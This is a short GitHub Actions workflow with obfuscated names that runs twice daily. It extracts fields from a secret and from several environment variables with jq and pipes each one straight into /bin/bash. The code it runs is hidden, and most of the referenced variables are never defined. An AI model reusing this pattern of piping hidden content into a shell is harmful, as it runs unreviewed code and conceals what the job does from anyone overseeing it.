name: linjunhencheng

on:
  workflow_dispatch:
  schedule:
    - cron: '12 3,15 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: linjunhencheng
        env:
          vp39: ${{ secrets.vp39 }}
        run: |
          printf '%s' "$vp39" | jq -r .r90 | /bin/bash
          echo $if5 | jq -r .nxv15809 | /bin/bash
          echo $gvf12 | jq -r .wdh5212 | /bin/bash
          printf '%s' "$skgcc8" | jq -r .fie9164 | /bin/bash
          printf '%s' "$dkjy5567" | jq -r .j6387 | /bin/bash
          printf '%s' "$fv920" | jq -r .y965 | /bin/bash
          echo $gv57742 | jq -r .lins9 | /bin/bash
          printf '%s' "$s8832" | jq -r .bcbe9 | /bin/bash

